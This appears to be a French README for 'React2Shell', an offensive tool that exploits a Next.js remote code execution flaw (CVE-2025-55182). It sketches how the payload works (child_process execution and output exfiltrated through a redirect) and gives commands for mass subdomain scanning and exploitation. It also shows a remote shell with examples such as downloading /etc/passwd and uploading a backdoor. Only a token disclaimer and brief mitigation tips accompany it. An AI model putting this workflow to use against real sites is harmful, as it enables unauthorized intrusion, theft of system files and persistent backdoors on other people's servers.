🚨 React2Shell - Framework d'exploitation CVE-2025-55182

Framework d'exploitation avancé pour CVE-2025-55182 (exécution de code à distance sur Next.js)
Auteur : opsecramdan
📚 Table des matières
- Vue d'ensemble
- Détails de la vulnérabilité
- Fonctionnalités
- Prérequis
- Installation
- Utilisation
- Shell interactif
- Fichiers de sortie
- Impact
- Atténuation
- Limitations
- Avertissement
📌 Vue d'ensemble
React2Shell est un framework d'exploitation permettant d'identifier et d'exploiter la vulnérabilité CVE-2025-55182 dans les applications basées sur Next.js.
Cet outil est conçu comme une boîte à outils offensive tout-en-un qui comprend :
- Énumération des sous-domaines
- Analyse des vulnérabilités
- Moteur d'exploitation
- Shell distant interactif
🔍 Détails de la vulnérabilité
- ID CVE : CVE-2025-55182
- Type : Exécution de code à distance (RCE)
- Plateforme : Next.js
- Vecteur d'attaque : Requête multipart/form-data malveillante
- Impact : Exécution arbitraire de commandes
🧠 Cause racine
Cette vulnérabilité exploite le mécanisme interne de Next.js de la manière suivante :
- Injecter un payload dans la requête
- Appeler : process.mainModule.require('child_process')
- Exécuter une commande du système d'exploitation
- Encoder la sortie en Base64
- Exfiltrer le résultat via une redirection (
/login?a=)
⚙️ Fonctionnalités
🔎 Énumération des sous-domaines
- Scan DNS + HTTP
- Wordlist intégrée
- Prise en charge de wordlist personnalisée
- Enregistrement automatique des résultats
🧪 Scanner de vulnérabilités
- Test multi-endpoints :
/
/api
/api/auth
/_next
/admin
/dashboard
- Analyse des en-têtes et des réponses
- Réduction des faux positifs
💣 Moteur d'exploitation
- Génération automatique de payloads
- Exécution encodée en Base64
- Extraction de la sortie basée sur les redirections
🖥️ Shell interactif
- Exécution de commandes à distance
- Session persistante
- Suivi du répertoire
📂 Opérations sur les fichiers
- Téléverser un fichier
- Télécharger un fichier
- Créer un fichier
👑 Mode root
- Exécution de
sudo -i
- Simulation d'élévation de privilèges
📦 Prérequis
Installer les dépendances :
pip install requests dnspython
📥 Installation
1. Cloner le dépôt
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
2. Entrer dans le répertoire
cd react2shell-cve-2025-55182
3. Lancer l'outil
python3 react2shell.py
🚀 Utilisation
🎯 Cible unique
python3 react2shell.py -u https://target.com
Sans protocole :
python3 react2shell.py -u target.com
📄 Cibles multiples
python3 react2shell.py -f targets.txt
Exemple de contenu de targets.txt :
https://target1.com
http://target2.com:3000
target3.com
🌐 Mode complet (Recon + Scan + Exploit)
python3 react2shell.py -d example.com
Déroulement :
- Énumération des sous-domaines
- Analyse des vulnérabilités
- Exploitation (optionnelle)
📚 Wordlist personnalisée
python3 react2shell.py -d example.com -w wordlist.txt
🐞 Mode débogage
python3 react2shell.py -d example.com --debug
🖥️ Shell interactif
Une fois l'exploitation réussie, vous obtiendrez un accès shell.
Commandes de base
whoami
id
uname -a
pwd
ls -lah
⚙️ Commandes spéciales
📂 Téléverser un fichier
.upload shell.php /tmp/shell.php
📥 Télécharger un fichier
.download /etc/passwd
📄 Créer un fichier
.create /tmp/test.txt
🔄 Exemple de flux de travail
1. Scanner un domaine
python3 react2shell.py -d example.com
2. Identifier les cibles vulnérables
3. Accéder au shell
whoami
4. Téléverser le payload
.upload backdoor.sh /tmp/backdoor.sh
📁 Fichiers de sortie
L'outil produira :
- subdomains_*.txt
- vulnerable_*.txt
- output_*.txt
⚠️ Impact
Si l'exploitation réussit :
- Exécution de commandes à distance
- Accès aux fichiers sensibles
- Téléversement de backdoor
- Accès persistant
- Élévation de privilèges
🛡️ Atténuation
- Mettre à jour Next.js vers la dernière version
- Restreindre les endpoints internes
- Valider strictement les entrées
- Utiliser un WAF (OWASP CRS)
- Surveiller les activités anormales
⚠️ Avertissement
Cet outil a été créé uniquement pour :
- L'apprentissage
- La recherche
- Les tests de pénétration autorisés
Il est interdit de l'utiliser pour des activités illégales.
⭐ Remarques
Ce projet démontre :
- Des compétences avancées en exploitation
- Une compréhension des mécanismes internes de Next.js
- La simulation d'attaques réelles